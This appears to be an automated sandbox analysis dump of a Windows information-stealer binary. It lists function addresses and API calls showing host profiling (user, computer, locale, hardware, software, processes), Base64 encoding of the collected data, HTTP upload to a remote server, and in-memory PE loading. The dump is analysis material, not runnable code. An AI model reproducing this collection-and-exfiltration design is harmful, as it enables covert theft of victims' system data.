735ce9 13680->13681 13682 74a8a0 lstrcpy 13681->13682 13683 735cf2 13682->13683 13684 74a920 3 API calls 13683->13684 13685 735d10 13684->13685 13686 74a8a0 lstrcpy 13685->13686 13687 735d19 13686->13687 13688 74a9b0 4 API calls 13687->13688 13689 735d38 13688->13689 13690 74a8a0 lstrcpy 13689->13690 13691 735d41 13690->13691 13692 74a9b0 4 API calls 13691->13692 13693 735d60 13692->13693 13694 74a8a0 lstrcpy 13693->13694 13695 735d69 13694->13695 13696 74a920 3 API calls 13695->13696 13697 735d87 13696->13697 13698 74a8a0 lstrcpy 13697->13698 13699 735d90 13698->13699 13700 74a9b0 4 API calls 13699->13700 13701 735daf 13700->13701 13702 74a8a0 lstrcpy 13701->13702 13703 735db8 13702->13703 13704 74a9b0 4 API calls 13703->13704 13705 735dd9 13704->13705 13706 74a8a0 lstrcpy 13705->13706 13707 735de2 13706->13707 13708 74a9b0 4 API calls 13707->13708 13709 735e02 13708->13709 13710 74a8a0 lstrcpy 13709->13710 13711 735e0b 13710->13711 13712 74a9b0 4 API calls 13711->13712 13713 735e2a 13712->13713 13714 74a8a0 lstrcpy 13713->13714 13715 735e33 13714->13715 13716 74a920 3 API calls 13715->13716 13717 735e54 13716->13717 13718 74a8a0 lstrcpy 13717->13718 13719 735e5d 13718->13719 13720 735e70 lstrlenA 13719->13720 14539 74aad0 13720->14539 13722 735e81 lstrlenA GetProcessHeap HeapAlloc 14540 74aad0 13722->14540 13724 735eae lstrlenA 14541 74aad0 13724->14541 13726 735ebe memcpy 14542 74aad0 13726->14542 13728 735ed7 lstrlenA 13729 735ee7 13728->13729 13730 735ef0 lstrlenA memcpy 13729->13730 14543 74aad0 13730->14543 13732 735f1a lstrlenA 14544 74aad0 13732->14544 13734 735f2a HttpSendRequestA 13735 735f35 InternetReadFile 13734->13735 13736 735f6a InternetCloseHandle 13735->13736 13740 735f61 13735->13740 13736->13658 13738 74a9b0 4 API calls 13738->13740 13739 74a8a0 lstrcpy 13739->13740 13740->13735 13740->13736 13740->13738 13740->13739 14545 74aad0 13741->14545 13743 741077 strtok_s 13745 741084 13743->13745 13744 741151 13744->12506 13745->13744 13746 74112d strtok_s 13745->13746 13747 74a820 lstrlenA lstrcpy 13745->13747 13746->13745 13747->13745 14546 74aad0 13748->14546 13750 740db7 strtok_s 13755 740dc4 13750->13755 13751 740ef3 strtok_s 13751->13755 13752 740ea4 StrCmpCA 13752->13755 13753 740e27 StrCmpCA 13753->13755 13754 740e67 StrCmpCA 13754->13755 13755->13751 13755->13752 13755->13753 13755->13754 13756 740f17 13755->13756 13757 74a820 lstrlenA lstrcpy 13755->13757 13756->12514 13757->13755 14547 74aad0 13758->14547 13760 740f67 strtok_s 13762 740f74 13760->13762 13761 741044 13761->12522 13762->13761 13763 740fb2 StrCmpCA 13762->13763 13764 74a820 lstrlenA lstrcpy 13762->13764 13765 741020 strtok_s 13762->13765 13763->13762 13764->13762 13765->13762 13767 74a740 lstrcpy 13766->13767 13768 741a26 13767->13768 13769 74a9b0 4 API calls 13768->13769 13770 741a37 13769->13770 13771 74a8a0 lstrcpy 13770->13771 13772 741a40 13771->13772 13773 74a9b0 4 API calls 13772->13773 13774 741a5b 13773->13774 13775 74a8a0 lstrcpy 13774->13775 13776 741a64 13775->13776 13777 74a9b0 4 API calls 13776->13777 13778 741a7d 13777->13778 13779 74a8a0 lstrcpy 13778->13779 13780 741a86 13779->13780 13781 74a9b0 4 API calls 13780->13781 13782 741aa1 13781->13782 13783 74a8a0 lstrcpy 13782->13783 13784 741aaa 13783->13784 13785 74a9b0 4 API calls 13784->13785 13786 741ac3 13785->13786 13787 74a8a0 lstrcpy 13786->13787 13788 741acc 13787->13788 13789 74a9b0 4 API calls 13788->13789 13790 741ae7 13789->13790 13791 74a8a0 lstrcpy 13790->13791 13792 741af0 13791->13792 13793 74a9b0 4 API calls 13792->13793 13794 741b09 13793->13794 13795 74a8a0 lstrcpy 13794->13795 13796 741b12 13795->13796 13797 74a9b0 4 API calls 13796->13797 13798 741b2d 13797->13798 13799 74a8a0 lstrcpy 13798->13799 13800 741b36 13799->13800 13801 74a9b0 4 API calls 13800->13801 13802 741b4f 13801->13802 13803 74a8a0 lstrcpy 13802->13803 13804 741b58 13803->13804 13805 74a9b0 4 API calls 13804->13805 13806 741b76 13805->13806 13807 74a8a0 lstrcpy 13806->13807 13808 741b7f 13807->13808 13809 747500 6 API calls 13808->13809 13810 741b96 13809->13810 13811 74a920 3 API calls 13810->13811 13812 741ba9 13811->13812 13813 74a8a0 lstrcpy 13812->13813 13814 741bb2 13813->13814 13815 74a9b0 4 API calls 13814->13815 13816 741bdc 13815->13816 13817 74a8a0 lstrcpy 13816->13817 13818 741be5 13817->13818 13819 74a9b0 4 API calls 13818->13819 13820 741c05 13819->13820 13821 74a8a0 lstrcpy 13820->13821 13822 741c0e 13821->13822 14548 747690 GetProcessHeap HeapAlloc 13822->14548 13825 74a9b0 4 API calls 13826 741c2e 13825->13826 13827 74a8a0 lstrcpy 13826->13827 13828 741c37 13827->13828 13829 74a9b0 4 API calls 13828->13829 13830 741c56 13829->13830 13831 74a8a0 lstrcpy 13830->13831 13832 741c5f 13831->13832 13833 74a9b0 4 API calls 13832->13833 13834 741c80 13833->13834 13835 74a8a0 lstrcpy 13834->13835 13836 741c89 13835->13836 14555 7477c0 GetCurrentProcess IsWow64Process 13836->14555 13839 74a9b0 4 API calls 13840 741ca9 13839->13840 13841 74a8a0 lstrcpy 13840->13841 13842 741cb2 13841->13842 13843 74a9b0 4 API calls 13842->13843 13844 741cd1 13843->13844 13845 74a8a0 lstrcpy 13844->13845 13846 741cda 13845->13846 13847 74a9b0 4 API calls 13846->13847 13848 741cfb 13847->13848 13849 74a8a0 lstrcpy 13848->13849 13850 741d04 13849->13850 13851 747850 3 API calls 13850->13851 13852 741d14 13851->13852 13853 74a9b0 4 API calls 13852->13853 13854 741d24 13853->13854 13855 74a8a0 lstrcpy 13854->13855 13856 741d2d 13855->13856 13857 74a9b0 4 API calls 13856->13857 13858 741d4c 13857->13858 13859 74a8a0 lstrcpy 13858->13859 13860 741d55 13859->13860 13861 74a9b0 4 API calls 13860->13861 13862 741d75 13861->13862 13863 74a8a0 lstrcpy 13862->13863 13864 741d7e 13863->13864 13865 7478e0 3 API calls 13864->13865 13866 741d8e 13865->13866 13867 74a9b0 4 API calls 13866->13867 13868 741d9e 13867->13868 13869 74a8a0 lstrcpy 13868->13869 13870 741da7 13869->13870 13871 74a9b0 4 API calls 13870->13871 13872 741dc6 13871->13872 13873 74a8a0 lstrcpy 13872->13873 13874 741dcf 13873->13874 13875 74a9b0 4 API calls 13874->13875 13876 741df0 13875->13876 13877 74a8a0 lstrcpy 13876->13877 13878 741df9 13877->13878 14557 747980 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 13878->14557 13881 74a9b0 4 API calls 13882 741e19 13881->13882 13883 74a8a0 lstrcpy 13882->13883 13884 741e22 13883->13884 13885 74a9b0 4 API calls 13884->13885 13886 741e41 13885->13886 13887 74a8a0 lstrcpy 13886->13887 13888 741e4a 13887->13888 13889 74a9b0 4 API calls 13888->13889 13890 741e6b 13889->13890 13891 74a8a0 lstrcpy 13890->13891 13892 741e74 13891->13892 14559 747a30 GetProcessHeap HeapAlloc GetTimeZoneInformation 13892->14559 13895 74a9b0 4 API calls 13896 741e94 13895->13896 13897 74a8a0 lstrcpy 13896->13897 13898 741e9d 13897->13898 13899 74a9b0 4 API calls 13898->13899 13900 741ebc 13899->13900 13901 74a8a0 lstrcpy 13900->13901 13902 741ec5 13901->13902 13903 74a9b0 4 API calls 13902->13903 13904 741ee5 13903->13904 13905 74a8a0 lstrcpy 13904->13905 13906 741eee 13905->13906 14562 747b00 GetUserDefaultLocaleName 13906->14562 13909 74a9b0 4 API calls 13910 741f0e 13909->13910 13911 74a8a0 lstrcpy 13910->13911 13912 741f17 13911->13912 13913 74a9b0 4 API calls 13912->13913 13914 741f36 13913->13914 13915 74a8a0 lstrcpy 13914->13915 13916 741f3f 13915->13916 13917 74a9b0 4 API calls 13916->13917 13918 741f60 13917->13918 13919 74a8a0 lstrcpy 13918->13919 13920 741f69 13919->13920 14566 747b90 13920->14566 13922 741f80 13923 74a920 3 API calls 13922->13923 13924 741f93 13923->13924 13925 74a8a0 lstrcpy 13924->13925 13926 741f9c 13925->13926 13927 74a9b0 4 API calls 13926->13927 13928 741fc6 13927->13928 13929 74a8a0 lstrcpy 13928->13929 13930 741fcf 13929->13930 13931 74a9b0 4 API calls 13930->13931 13932 741fef 13931->13932 13933 74a8a0 lstrcpy 13932->13933 13934 741ff8 13933->13934 14578 747d80 GetSystemPowerStatus 13934->14578 13937 74a9b0 4 API calls 13938 742018 13937->13938 13939 74a8a0 lstrcpy 13938->13939 13940 742021 13939->13940 13941 74a9b0 4 API calls 13940->13941 13942 742040 13941->13942 13943 74a8a0 lstrcpy 13942->13943 13944 742049 13943->13944 13945 74a9b0 4 API calls 13944->13945 13946 74206a 13945->13946 13947 74a8a0 lstrcpy 13946->13947 13948 742073 13947->13948 13949 74207e GetCurrentProcessId 13948->13949 14580 749470 OpenProcess 13949->14580 13952 74a920 3 API calls 13953 7420a4 13952->13953 13954 74a8a0 lstrcpy 13953->13954 13955 7420ad 13954->13955 13956 74a9b0 4 API calls 13955->13956 13957 7420d7 13956->13957 13958 74a8a0 lstrcpy 13957->13958 13959 7420e0 13958->13959 13960 74a9b0 4 API calls 13959->13960 13961 742100 13960->13961 13962 74a8a0 lstrcpy 13961->13962 13963 742109 13962->13963 14585 747e00 GetProcessHeap HeapAlloc RegOpenKeyExA 13963->14585 13966 74a9b0 4 API calls 13967 742129 13966->13967 13968 74a8a0 lstrcpy 13967->13968 13969 742132 13968->13969 13970 74a9b0 4 API calls 13969->13970 13971 742151 13970->13971 13972 74a8a0 lstrcpy 13971->13972 13973 74215a 13972->13973 13974 74a9b0 4 API calls 13973->13974 13975 74217b 13974->13975 13976 74a8a0 lstrcpy 13975->13976 13977 742184 13976->13977 14589 747f60 13977->14589 13980 74a9b0 4 API calls 13981 7421a4 13980->13981 13982 74a8a0 lstrcpy 13981->13982 13983 7421ad 13982->13983 13984 74a9b0 4 API calls 13983->13984 13985 7421cc 13984->13985 13986 74a8a0 lstrcpy 13985->13986 13987 7421d5 13986->13987 13988 74a9b0 4 API calls 13987->13988 13989 7421f6 13988->13989 13990 74a8a0 lstrcpy 13989->13990 13991 7421ff 13990->13991 14602 747ed0 GetSystemInfo wsprintfA 13991->14602 13994 74a9b0 4 API calls 13995 74221f 13994->13995 13996 74a8a0 lstrcpy 13995->13996 13997 742228 13996->13997 13998 74a9b0 4 API calls 13997->13998 13999 742247 13998->13999 14000 74a8a0 lstrcpy 13999->14000 14001 742250 14000->14001 14002 74a9b0 4 API calls 14001->14002 14003 742270 14002->14003 14004 74a8a0 lstrcpy 14003->14004 14005 742279 14004->14005 14604 748100 GetProcessHeap HeapAlloc 14005->14604 14008 74a9b0 4 API calls 14009 742299 14008->14009 14010 74a8a0 lstrcpy 14009->14010 14011 7422a2 14010->14011 14012 74a9b0 4 API calls 14011->14012 14013 7422c1 14012->14013 14014 74a8a0 lstrcpy 14013->14014 14015 7422ca 14014->14015 14016 74a9b0 4 API calls 14015->14016 14017 7422eb 14016->14017 14018 74a8a0 lstrcpy 14017->14018 14019 7422f4 14018->14019 14610 7487c0 14019->14610 14022 74a920 3 API calls 14023 74231e 14022->14023 14024 74a8a0 lstrcpy 14023->14024 14025 742327 14024->14025 14026 74a9b0 4 API calls 14025->14026 14027 742351 14026->14027 14028 74a8a0 lstrcpy 14027->14028 14029 74235a 14028->14029 14030 74a9b0 4 API calls 14029->14030 14031 74237a 14030->14031 14032 74a8a0 lstrcpy 14031->14032 14033 742383 14032->14033 14034 74a9b0 4 API calls 14033->14034 14035 7423a2 14034->14035 14036 74a8a0 lstrcpy 14035->14036 14037 7423ab 14036->14037 14615 7481f0 14037->14615 14039 7423c2 14040 74a920 3 API calls 14039->14040 14041 7423d5 14040->14041 14042 74a8a0 lstrcpy 14041->14042 14043 7423de 14042->14043 14044 74a9b0 4 API calls 14043->14044 14045 74240a 14044->14045 14046 74a8a0 lstrcpy 14045->14046 14047 742413 14046->14047 14048 74a9b0 4 API calls 14047->14048 14049 742432 14048->14049 14050 74a8a0 lstrcpy 14049->14050 14051 74243b 14050->14051 14052 74a9b0 4 API calls 14051->14052 14053 74245c 14052->14053 14054 74a8a0 lstrcpy 14053->14054 14055 742465 14054->14055 14056 74a9b0 4 API calls 14055->14056 14057 742484 14056->14057 14058 74a8a0 lstrcpy 14057->14058 14059 74248d 14058->14059 14060 74a9b0 4 API calls 14059->14060 14061 7424ae 14060->14061 14062 74a8a0 lstrcpy 14061->14062 14063 7424b7 14062->14063 14623 748320 14063->14623 14065 7424d3 14066 74a920 3 API calls 14065->14066 14067 7424e6 14066->14067 14068 74a8a0 lstrcpy 14067->14068 14069 7424ef 14068->14069 14070 74a9b0 4 API calls 14069->14070 14071 742519 14070->14071 14072 74a8a0 lstrcpy 14071->14072 14073 742522 14072->14073 14074 74a9b0 4 API calls 14073->14074 14075 742543 14074->14075 14076 74a8a0 lstrcpy 14075->14076 14077 74254c 14076->14077 14078 748320 17 API calls 14077->14078 14079 742568 14078->14079 14080 74a920 3 API calls 14079->14080 14081 74257b 14080->14081 14082 74a8a0 lstrcpy 14081->14082 14083 742584 14082->14083 14084 74a9b0 4 API calls 14083->14084 14085 7425ae 14084->14085 14086 74a8a0 lstrcpy 14085->14086 14087 7425b7 14086->14087 14088 74a9b0 4 API calls 14087->14088 14089 7425d6 14088->14089 14090 74a8a0 lstrcpy 14089->14090 14091 7425df 14090->14091 14092 74a9b0 4 API calls 14091->14092 14093 742600 14092->14093 14094 74a8a0 lstrcpy 14093->14094 14095 742609 14094->14095 14659 748680 14095->14659 14097 742620 14098 74a920 3 API calls 14097->14098 14099 742633 14098->14099 14100 74a8a0 lstrcpy 14099->14100 14101 74263c 14100->14101 14102 74265a lstrlenA 14101->14102 14103 74266a 14102->14103 14104 74a740 lstrcpy 14103->14104 14105 74267c 14104->14105 14106 731590 lstrcpy 14105->14106 14107 74268d 14106->14107 14669 745190 14107->14669 14109 742699 14109->12526 14863 74aad0 14110->14863 14112 735009 InternetOpenUrlA 14117 735021 14112->14117 14113 7350a0 InternetCloseHandle InternetCloseHandle 14115 7350ec 14113->14115 14114 73502a InternetReadFile 14114->14117 14115->12530 14116 735070 memcpy 14116->14117 14117->14113 14117->14114 14117->14116 14864 7398d0 14118->14864 14120 740759 14121 74077d 14120->14121 14122 740a38 14120->14122 14125 740799 StrCmpCA 14121->14125 14123 731590 lstrcpy 14122->14123 14124 740a49 14123->14124 15040 740250 14124->15040 14127 7407a8 14125->14127 14128 740843 14125->14128 14130 74a7a0 lstrcpy 14127->14130 14131 740865 StrCmpCA 14128->14131 14132 7407c3 14130->14132 14133 740874 14131->14133 14170 74096b 14131->14170 14134 731590 lstrcpy 14132->14134 14135 74a740 lstrcpy 14133->14135 14136 74080c 14134->14136 14138 740881 14135->14138 14139 74a7a0 lstrcpy 14136->14139 14137 74099c StrCmpCA 14140 740a2d 14137->14140 14141 7409ab 14137->14141 14142 74a9b0 4 API calls 14138->14142 14143 740823 14139->14143 14140->12534 14144 731590 lstrcpy 14141->14144 14145 7408ac 14142->14145 14146 74a7a0 lstrcpy 14143->14146 14147 7409f4 14144->14147 14148 74a920 3 API calls 14145->14148 14150 74a7a0 lstrcpy 14147->14150 14170->14137 14498 74a7a0 lstrcpy 14497->14498 14499 731683 14498->14499 14500 74a7a0 lstrcpy 14499->14500 14501 731695 14500->14501 14502 74a7a0 lstrcpy 14501->14502 14503 7316a7 14502->14503 14504 74a7a0 lstrcpy 14503->14504 14505 7315a3 14504->14505 14505->13356 14534 731030 14506->14534 14510 734838 lstrlenA 14537 74aad0 14510->14537 14512 734848 InternetCrackUrlA 14513 734867 14512->14513 14513->13433 14515 734eee 14514->14515 14516 739af9 LocalAlloc 14514->14516 14515->13455 14515->13457 14516->14515 14517 739b14 CryptStringToBinaryA 14516->14517 14517->14515 14518 739b39 LocalFree 14517->14518 14518->14515 14520 74a740 lstrcpy 14519->14520 14521 748b74 14520->14521 14522 74a740 lstrcpy 14521->14522 14523 748b82 GetSystemTime 14522->14523 14525 748b99 14523->14525 14524 74a7a0 lstrcpy 14526 748bfc 14524->14526 14525->14524 14526->13449 14528 74a931 14527->14528 14529 74a988 14528->14529 14531 74a968 lstrcpy lstrcatA 14528->14531 14530 74a7a0 lstrcpy 14529->14530 14532 74a994 14530->14532 14531->14529 14532->13452 14533->13567 14535 73103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 14534->14535 14536 74aad0 14535->14536 14536->14510 14537->14512 14538->13577 14539->13722 14540->13724 14541->13726 14542->13728 14543->13732 14544->13734 14545->13743 14546->13750 14547->13760 14676 7477a0 14548->14676 14551 7476c6 RegOpenKeyExA 14553 747704 RegCloseKey 14551->14553 14554 7476e7 RegQueryValueExA 14551->14554 14552 741c1e 14552->13825 14553->14552 14554->14553 14556 741c99 14555->14556 14556->13839 14558 741e09 14557->14558 14558->13881 14560 741e84 14559->14560 14561 747a9a wsprintfA 14559->14561 14560->13895 14561->14560 14563 741efe 14562->14563 14564 747b4d 14562->14564 14563->13909 14683 748d20 LocalAlloc CharToOemW 14564->14683 14567 74a740 lstrcpy 14566->14567 14568 747bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 14567->14568 14569 747c25 14568->14569 14570 747c46 GetLocaleInfoA 14569->14570 14571 747d18 14569->14571 14574 74a9b0 lstrcpy lstrlenA lstrcpy lstrcatA 14569->14574 14577 74a8a0 lstrcpy 14569->14577 14570->14569 14572 747d1e LocalFree 14571->14572 14573 747d28 14571->14573 14572->14573 14575 74a7a0 lstrcpy 14573->14575 14574->14569 14576 747d37 14575->14576 14576->13922 14577->14569 14579 742008 14578->14579 14579->13937 14581 7494b5 14580->14581 14582 749493 GetModuleFileNameExA CloseHandle 14580->14582 14583 74a740 lstrcpy 14581->14583 14582->14581 14584 742091 14583->14584 14584->13952 14586 747e68 RegQueryValueExA 14585->14586 14588 742119 14585->14588 14587 747e8e RegCloseKey 14586->14587 14587->14588 14588->13966 14590 747fb9 GetLogicalProcessorInformationEx 14589->14590 14591 747fd8 GetLastError 14590->14591 14596 748029 14590->14596 14593 748022 14591->14593 14601 747fe3 14591->14601 14592 742194 14592->13980 14593->14592 14597 7489f0 2 API calls 14593->14597 14598 7489f0 2 API calls 14596->14598 14597->14592 14599 74807b 14598->14599 14599->14593 14600 748084 wsprintfA 14599->14600 14600->14592 14601->14590 14601->14592 14684 7489f0 14601->14684 14687 748a10 GetProcessHeap HeapAlloc 14601->14687 14603 74220f 14602->14603 14603->13994 14605 7489b0 14604->14605 14606 74814d GlobalMemoryStatusEx 14605->14606 14607 748163 __aulldiv 14606->14607 14608 74819b wsprintfA 14607->14608 14609 742289 14608->14609 14609->14008 14611 7487fb GetProcessHeap HeapAlloc wsprintfA 14610->14611 14613 74a740 lstrcpy 14611->14613 14614 74230b 14613->14614 14614->14022 14616 74a740 lstrcpy 14615->14616 14622 748229 14616->14622 14617 748263 14619 74a7a0 lstrcpy 14617->14619 14618 74a9b0 lstrcpy lstrlenA lstrcpy lstrcatA 14618->14622 14620 7482dc 14619->14620 14620->14039 14621 74a8a0 lstrcpy 14621->14622 14622->14617 14622->14618 14622->14621 14624 74a740 lstrcpy 14623->14624 14625 74835c RegOpenKeyExA 14624->14625 14626 7483d0 14625->14626 14627 7483ae 14625->14627 14629 748613 RegCloseKey 14626->14629 14630 7483f8 RegEnumKeyExA 14626->14630 14628 74a7a0 lstrcpy 14627->14628 14632 7483bd 14628->14632 14631 74a7a0 lstrcpy 14629->14631 14633 74860e 14630->14633 14634 74843f wsprintfA RegOpenKeyExA 14630->14634 14631->14632 14632->14065 14633->14629 14635 748485 RegCloseKey RegCloseKey 14634->14635 14636 7484c1 RegQueryValueExA 14634->14636 14637 74a7a0 lstrcpy 14635->14637 14638 748601 RegCloseKey 14636->14638 14639 7484fa lstrlenA 14636->14639 14637->14632 14638->14633 14639->14638 14640 748510 14639->14640 14641 74a9b0 4 API calls 14640->14641 14642 748527 14641->14642 14643 74a8a0 lstrcpy 14642->14643 14644 748533 14643->14644 14645 74a9b0 4 API calls 14644->14645 14646 748557 14645->14646 14647 74a8a0 lstrcpy 14646->14647 14648 748563 14647->14648 14649 74856e RegQueryValueExA 14648->14649 14649->14638 14650 7485a3 14649->14650 14651 74a9b0 4 API calls 14650->14651 14652 7485ba 14651->14652 14653 74a8a0 lstrcpy 14652->14653 14654 7485c6 14653->14654 14655 74a9b0 4 API calls 14654->14655 14656 7485ea 14655->14656 14657 74a8a0 lstrcpy 14656->14657 14658 7485f6 14657->14658 14658->14638 14660 74a740 lstrcpy 14659->14660 14661 7486bc CreateToolhelp32Snapshot Process32First 14660->14661 14662 74875d CloseHandle 14661->14662 14663 7486e8 Process32Next 14661->14663 14664 74a7a0 lstrcpy 14662->14664 14663->14662 14668 7486fd 14663->14668 14666 748776 14664->14666 14665 74a8a0 lstrcpy 14665->14668 14666->14097 14667 74a9b0 lstrcpy lstrlenA lstrcpy lstrcatA 14667->14668 14668->14663 14668->14665 14668->14667 14670 74a7a0 lstrcpy 14669->14670 14671 7451b5 14670->14671 14672 731590 lstrcpy 14671->14672 14673 7451c6 14672->14673 14688 735100 14673->14688 14675 7451cf 14675->14109 14679 747720 GetProcessHeap HeapAlloc RegOpenKeyExA 14676->14679 14678 7476b9 14678->14551 14678->14552 14680 747765 RegQueryValueExA 14679->14680 14681 747780 RegCloseKey 14679->14681 14680->14681 14682 747793 14681->14682 14682->14678 14683->14563 14685 748a0c 14684->14685 14686 7489f9 GetProcessHeap HeapFree 14684->14686 14685->14601 14686->14685 14687->14601 14689 74a7a0 lstrcpy 14688->14689 14690 735119 14689->14690 14691 7347b0 5 API calls 14690->14691 14692 735125 14691->14692 14850 748ea0 14692->14850 14694 735184 14695 735192 lstrlenA 14694->14695 14696 7351a5 14695->14696 14697 748ea0 4 API calls 14696->14697 14698 7351b6 14697->14698 14699 74a740 lstrcpy 14698->14699 14700 7351c9 14699->14700 14701 74a740 lstrcpy 14700->14701 14702 7351d6 14701->14702 14703 74a740 lstrcpy 14702->14703 14704 7351e3 14703->14704 14705 74a740 lstrcpy 14704->14705 14706 7351f0 14705->14706 14707 74a740 lstrcpy 14706->14707 14708 7351fd InternetOpenA StrCmpCA 14707->14708 14709 73522f 14708->14709 14710 7358c4 InternetCloseHandle 14709->14710 14711 748b60 3 API calls 14709->14711 14717 7358d9 ctype 14710->14717 14712 73524e 14711->14712 14713 74a920 3 API calls 14712->14713 14714 735261 14713->14714 14715 74a8a0 lstrcpy 14714->14715 14716 73526a 14715->14716 14718 74a9b0 4 API calls 14716->14718 14720 74a7a0 lstrcpy 14717->14720 14719 7352ab 14718->14719 14721 74a920 3 API calls 14719->14721 14728 735913 14720->14728 14722 7352b2 14721->14722 14723 74a9b0 4 API calls 14722->14723 14724 7352b9 14723->14724 14725 74a8a0 lstrcpy 14724->14725 14726 7352c2 14725->14726 14727 74a9b0 4 API calls 14726->14727 14729 735303 14727->14729 14728->14675 14730 74a920 3 API calls 14729->14730 14731 73530a 14730->14731 14732 74a8a0 lstrcpy 14731->14732 14733 735313 14732->14733 14734 735329 InternetConnectA 14733->14734 14734->14710 14735 735359 HttpOpenRequestA 14734->14735 14737 7358b7 InternetCloseHandle 14735->14737 14738 7353b7 14735->14738 14737->14710 14739 74a9b0 4 API calls 14738->14739 14740 7353cb 14739->14740 14741 74a8a0 lstrcpy 14740->14741 14742 7353d4 14741->14742 14743 74a920 3 API calls 14742->14743 14744 7353f2 14743->14744 14745 74a8a0 lstrcpy 14744->14745 14746 7353fb 14745->14746 14747 74a9b0 4 API calls 14746->14747 14748 73541a 14747->14748 14749 74a8a0 lstrcpy 14748->14749 14750 735423 14749->14750 14751 74a9b0 4 API calls 14750->14751 14752 735444 14751->14752 14753 74a8a0 lstrcpy 14752->14753 14851 748ead CryptBinaryToStringA 14850->14851 14854 748ea9 14850->14854 14852 748ece GetProcessHeap HeapAlloc 14851->14852 14851->14854 14853 748ef4 ctype 14852->14853 14852->14854 14855 748f05 CryptBinaryToStringA 14853->14855 14854->14694 14855->14854 14863->14112 15114 739880 ??2@YAPAXI 14864->15114 14866 7398e1 14866->14120 15041 74a740 lstrcpy 15040->15041 15042 740266 15041->15042 15043 748de0 2 API calls 15042->15043 15044 74027b 15043->15044 15045 74a920 3 API calls 15044->15045 15046 74028b 15045->15046 15117 736fb0 15114->15117 15116 7398ad ctype 15116->14866 15120 736d40 15117->15120 15121 736d63 15120->15121 15137 736d59 15120->15137 15138 736530 15121->15138 15125 736dbe 15125->15137 15148 7369b0 15125->15148 15129 736e4a 15129->15137 15137->15116 15139 736542 15138->15139 15141 736549 15139->15141 15164 748a10 GetProcessHeap HeapAlloc 15139->15164 15141->15137 15142 736660 15141->15142 15145 73668f VirtualAlloc 15142->15145 15144 736730 15146 736743 VirtualAlloc 15144->15146 15147 73673c 15144->15147 15145->15144 15145->15147 15146->15147 15147->15125 15149 7369c9 15148->15149 15152 7369d5 15148->15152 15150 736a09 LoadLibraryA 15149->15150 15149->15152 15151 736a32 15150->15151 15150->15152 15156 736ae0 15151->15156 15165 748a10 GetProcessHeap HeapAlloc 15151->15165 15152->15137 15160 736be0 15152->15160 15154 736a8b 15154->15152 15157 736ad1 15154->15157 15155 736ba8 GetProcAddress 15155->15152 15155->15156 15156->15152 15156->15155 15161 736bfb 15160->15161 15162 736c80 VirtualProtect 15161->15162 15163 736ca9 15161->15163 15162->15161 15162->15163 15163->15129 15164->15141 15165->15154 17057 74dc60 17060 74a710 17057->17060 17059 74dc6d atexit 17060->17059 12237 731190 12244 7478e0 GetProcessHeap HeapAlloc GetComputerNameA 12237->12244 12239 73119e 12240 7311cc 12239->12240 12246 747850 GetProcessHeap HeapAlloc GetUserNameA 12239->12246 12242 7311b7 12242->12240 12243 7311c4 ExitProcess 12242->12243 12245 747939 12244->12245 12245->12239 12247 7478c3 12246->12247 12247->12242

                                                            Control-flow Graph

                                                            APIs
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 007345CC
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 007345D7
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 007345E2
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 007345ED
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 007345F8
                                                            • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,007469FB), ref: 00734607
                                                            • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,007469FB), ref: 0073460E
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 0073461C
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 00734627
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 00734632
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 0073463D
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 00734648
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 0073465C
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 00734667
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 00734672
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 0073467D
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007469FB), ref: 00734688
                                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007346B1
